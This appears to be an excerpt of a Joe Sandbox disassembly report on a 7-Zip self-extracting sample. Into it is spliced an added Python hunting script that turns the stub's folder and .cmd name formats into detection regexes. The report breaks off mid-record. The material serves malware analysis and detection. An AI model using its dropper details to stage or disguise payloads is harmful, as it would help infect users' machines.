                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                            • String ID: k7@
                                                                            • API String ID: 635176117-1561861239
                                                                            • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                            • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                                            • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                            • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

                                                                            Control-flow Graph

                                                                            control_flow_graph 1153 40e9ef-40ea0a call 410a40 1156 40ea19-40ea52 call 406eb0 call 40f707 1153->1156 1157 40ea0c-40ea16 1153->1157 1162 40eb20-40eb46 call 40e79c call 40e6d7 1156->1162 1163 40ea58-40ea62 ??2@YAPAXI@Z 1156->1163 1175 40eb64-40eb7c call 40cdda call 401132 1162->1175 1176 40eb48-40eb5e call 40e2e8 1162->1176 1165 40ea71 1163->1165 1166 40ea64-40ea6f 1163->1166 1167 40ea73-40eaac call 40ef4a ??2@YAPAXI@Z 1165->1167 1166->1167 1173 40eabe 1167->1173 1174 40eaae-40eabc 1167->1174 1177 40eac0-40eaf9 call 40ef4a call 40c350 call 40e45f 1173->1177 1174->1177 1190 40ebb4-40ebc4 1175->1190 1191 40eb7e-40eb8b ??2@YAPAXI@Z 1175->1191 1176->1175 1184 40ece0-40ecf7 1176->1184 1206 40eb01-40eb06 1177->1206 1207 40eafb-40eafd 1177->1207 1195 40ee93-40eeae call 40e27a 1184->1195 1196 40ecfd 1184->1196 1208 40ebf4-40ebfa 1190->1208 1209 40ebc6 1190->1209 1192 40eb96 1191->1192 1193 40eb8d-40eb94 call 40e7c1 1191->1193 1198 40eb98-40eba8 call 40f707 1192->1198 1193->1198 1212 40eeb0-40eeb6 1195->1212 1213 40eeb9-40eebc 1195->1213 1202 40ed00-40ed30 1196->1202 1221 40ebaa-40ebad 1198->1221 1222 40ebaf 1198->1222 1219 40ed60-40eda6 call 40cd11 * 2 1202->1219 1220 40ed32-40ed38 1202->1220 1217 40eb08-40eb0a 1206->1217 1218 40eb0e-40eb1a 1206->1218 1207->1206 1214 40ec00-40ec20 call 40cf2f 1208->1214 1215 40ecce-40ecdd call 40e977 1208->1215 1216 40ebc8-40ebee call 40ce5c call 40e2c5 call 40e42c call 40e4dd 1209->1216 1212->1213 1213->1216 1224 40eec2-40eee9 call 40cd11 1213->1224 1234 40ec25-40ec2d 1214->1234 1215->1184 1216->1208 1217->1218 1218->1162 1218->1163 1264 40ee10 1219->1264 1265 40eda8-40edab 1219->1265 1228 40ee00-40ee02 1220->1228 1229 40ed3e-40ed50 1220->1229 1230 40ebb1 1221->1230 1222->1230 1246 40ef01-40ef1d 1224->1246 1247 40eeeb-40eeff call 4107a2 1224->1247 1240 40ee06-40ee0b 1228->1240 1251 40ed56-40ed58 1229->1251 1252 40edda-40eddc 1229->1252 1230->1190 1238 40ec33-40ec3a 1234->1238 1239 40edca-40edcf 1234->1239 1248 40ec68-40ec6b 1238->1248 1249 40ec3c-40ec40 1238->1249 1242 40edd1-40edd3 1239->1242 1243 40edd7 1239->1243 1240->1216 1242->1243 1243->1252 1318 40ef1e call 40bb40 1246->1318 1319 40ef1e call 40c5e0 1246->1319 1320 40ef1e call 40e17a 1246->1320 1321 40ef1e call 41297c 1246->1321 1247->1246 1253 40ec71-40ec7f call 40f707 1248->1253 1254 40edf9-40edfe 1248->1254 1249->1248 1257 40ec42-40ec45 1249->1257 1251->1219 1260 40ed5a-40ed5c 1251->1260 1261 40ede4-40ede7 1252->1261 1262 40edde-40ede0 1252->1262 1281 40ec81-40ec87 call 413226 1253->1281 1282 40ec8c-40ec9d call 40e45f 1253->1282 1254->1228 1254->1240 1267 40ec4b-40ec59 call 40f707 1257->1267 1268 40edec-40edf1 1257->1268 1258 40ef21-40ef2b call 40ce5c 1258->1216 1260->1219 1261->1216 1262->1261 1270 40ee13-40ee19 1264->1270 1275 40edae-40edc6 call 4107a2 1265->1275 1267->1282 1285 40ec5b-40ec66 call 413201 1267->1285 1268->1240 1274 40edf3-40edf5 1268->1274 1277 40ee64-40ee8d call 40ce5c * 2 1270->1277 1278 40ee1b-40ee27 call 40e558 1270->1278 1274->1254 1290 40edc8 1275->1290 1277->1195 1277->1202 1296 40ee35-40ee41 call 40e5a3 1278->1296 1297 40ee29-40ee33 1278->1297 1281->1282 1298 40eca5-40ecaa 1282->1298 1299 40ec9f-40eca1 1282->1299 1285->1282 1290->1270 1311 40ef30-40ef45 call 40ce5c * 2 1296->1311 1312 40ee47 1296->1312 1303 40ee4a-40ee62 call 4107a2 1297->1303 1300 40ecb2-40ecb7 1298->1300 1301 40ecac-40ecae 1298->1301 1299->1298 1306 40ecb9-40ecbb 1300->1306 1307 40ecbf-40ecc8 1300->1307 1301->1300 1303->1277 1303->1278 1306->1307 1307->1214 1307->1215 1311->1216 1312->1303 1318->1258 1319->1258 1320->1258 1321->1258
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID: DmA${D@
                                                                            • API String ID: 1033339047-1777112864
                                                                            • Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                            • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                                            • Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                            • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

                                                                             Control-flow Graph (rendered graph omitted): function 00410CCB-00410E23, calling sub_40E0D0, sub_41076B, sub_40E036, sub_40D041, memcpy, memmove and ??3@YAXPAX@Z
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                                            • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@memcpymemmove
                                                                            • String ID:
                                                                            • API String ID: 3549172513-0
                                                                            • Opcode ID: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                            • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                                            • Opcode Fuzzy Hash: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                            • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

                                                                             Control-flow Graph (rendered graph omitted): function 00404903-00404A40, calling COMCTL32 ordinal #17, sub_413370, sub_402131, sub_402187 (x7), SHGetSpecialFolderPathW, wsprintfW, sub_401458 (x2), sub_401370 (x2), sub_4032D9 and sub_40269A; the graph loops back to the SHGetSpecialFolderPathW block
                                                                            APIs
                                                                            • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                                              • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                              • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                              • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                              • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                              • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                              • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00618E68,00404926), ref: 0040224B
                                                                              • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00618E68), ref: 0040225B
                                                                              • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                              • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                              • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                              • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                              • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                              • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                                              • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00618E68,00000002), ref: 00402334
                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                                            • wsprintfW.USER32 ref: 004049B0
                                                                              • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                            • String ID: 7zSfxFolder%02d
                                                                            • API String ID: 3387708999-2820892521
                                                                            • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                            • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                                            • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                            • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

                                                                             Control-flow Graph (rendered graph omitted): function 00402BEE-00402D2F, calling sub_413660, sub_40D041, lstrlenA (x2), sub_40D00D, memcmp (x2), memmove and sub_40292B
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                                            • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                                            • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                                            • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                                            • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlenmemcmp$memmove
                                                                            • String ID:
                                                                            • API String ID: 3251180759-0
                                                                            • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                            • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                                            • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                            • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

                                                                             Control-flow Graph (rendered graph omitted): function 00402DD6-00402EE5, calling sub_401458, sub_4013A9, sub_401526, sub_401C46, sub_40283B, sub_402AD8, sub_401429 and ??3@YAXPAX@Z
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                              • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1731127917-0
                                                                            • Opcode ID: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                            • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                                            • Opcode Fuzzy Hash: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                            • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8

                                                                             Control-flow Graph (rendered graph omitted): function 00401611-00401729, calling sub_40F707, sub_401370, sub_401526, CreateThread, sub_40851F, WaitForSingleObject, GetExitCodeThread, sub_408DBF and SetLastError
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                                            • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                                              • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                              • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                                              • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                              • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                              • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                                              • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                              • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                              • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                              • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                              • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                              • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                            • String ID:
                                                                            • API String ID: 359084233-0
                                                                            • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                            • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                                            • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                            • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
                                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
                                                                            • wsprintfW.USER32 ref: 004045BB
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 004045D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: PathTemp$AttributesFilewsprintf
                                                                            • String ID:
                                                                            • API String ID: 1746483863-0
                                                                            • Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                            • Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
                                                                            • Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                            • Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94
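The two routines above expose the naming scheme of the 7-Zip SFX stub that wraps this sample: one formats "7zSfxFolder%02d" after SHGetSpecialFolderPathW (its graph loops back on the shell-folder lookup, consistent with retrying the next two-digit suffix when a folder already exists), the other formats "7ZSfx%03x.cmd" after GetTempPathW and checks the result with GetFileAttributesW. The following Python is an added hunting example, not part of the Joe Sandbox report or of the sample: it turns those two format strings into patterns and classifies file-creation paths from an endpoint log. The sample paths are constructed here; the assumption that the folder lands under the user's temp directory is ours (the CSIDL argument is not resolved in the report), so the folder pattern is matched anywhere in the path.

```python
import re

# Patterns derived from the format strings visible in the report:
#   "7zSfxFolder%02d" -> exactly two decimal digits, e.g. 7zSfxFolder00
#   "7ZSfx%03x.cmd"   -> exactly three hex digits, e.g. 7ZSfx01a.cmd
# Case-insensitive because NTFS paths are; either separator accepted.
SFX_FOLDER_RE = re.compile(r"(?i)[\\/]7zSfxFolder\d{2}(?:[\\/]|$)")
SFX_CMD_RE = re.compile(r"(?i)[\\/]7ZSfx[0-9a-f]{3}\.cmd$")


def classify_sfx_artifacts(paths):
    """Return {path: label} for every path that matches a 7-Zip SFX artifact.

    Labels:
      sfx-config-script  - the 7ZSfx%03x.cmd file the stub writes to the
                           temp path (GetTempPathW + wsprintfW in the report)
      sfx-extract-folder - a file inside a 7zSfxFolder%02d extraction folder
                           (SHGetSpecialFolderPathW + wsprintfW in the report)
    Paths that match neither are omitted, so the result doubles as a filter.
    """
    hits = {}
    for path in paths:
        if SFX_CMD_RE.search(path):
            hits[path] = "sfx-config-script"
        elif SFX_FOLDER_RE.search(path):
            hits[path] = "sfx-extract-folder"
    return hits


# Constructed sample file-creation paths (e.g. from a FileCreate event feed);
# none of these come from the report. Temp location is an assumption.
SAMPLE_PATHS = [
    r"C:\Users\victim\AppData\Local\Temp\7ZSfx01a.cmd",
    r"C:\Users\victim\AppData\Local\Temp\7zSfxFolder00\payload.exe",
    r"C:\Users\victim\AppData\Local\Temp\7zSfxFolder1\payload.exe",  # one digit: not %02d
    r"C:\Users\victim\AppData\Local\Temp\7ZSfx0001.cmd",             # four digits: not %03x
    r"C:\Windows\System32\cmd.exe",
]

if __name__ == "__main__":
    for path, label in classify_sfx_artifacts(SAMPLE_PATHS).items():
        print(f"{label:18} {path}")
```

Run it over your own file-creation telemetry in place of SAMPLE_PATHS; a hit on either label is a low-noise pivot to the SFX stub's extraction directory, where the dropped UltraVNC components from this report would be written.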
                                                                            APIs
                                                                              • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$ExceptionThrow
                                                                            • String ID: (nA
                                                                            • API String ID: 2803161813-867891557
                                                                            • Opcode ID: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                            • Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
                                                                            • Opcode Fuzzy Hash: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                            • Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
                                                                            APIs
                                                                            • SysAllocString.OLEAUT32(?), ref: 0040CBC4
                                                                            • _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AllocExceptionStringThrow
                                                                            • String ID: PlA
                                                                            • API String ID: 3773818493-1533977103
                                                                            • Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                            • Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
                                                                            • Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                            • Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
                                                                            APIs
                                                                              • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                              • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                              • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                            • ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                            • String ID:
                                                                            • API String ID: 1642057587-0
                                                                            • Opcode ID: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                            • Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
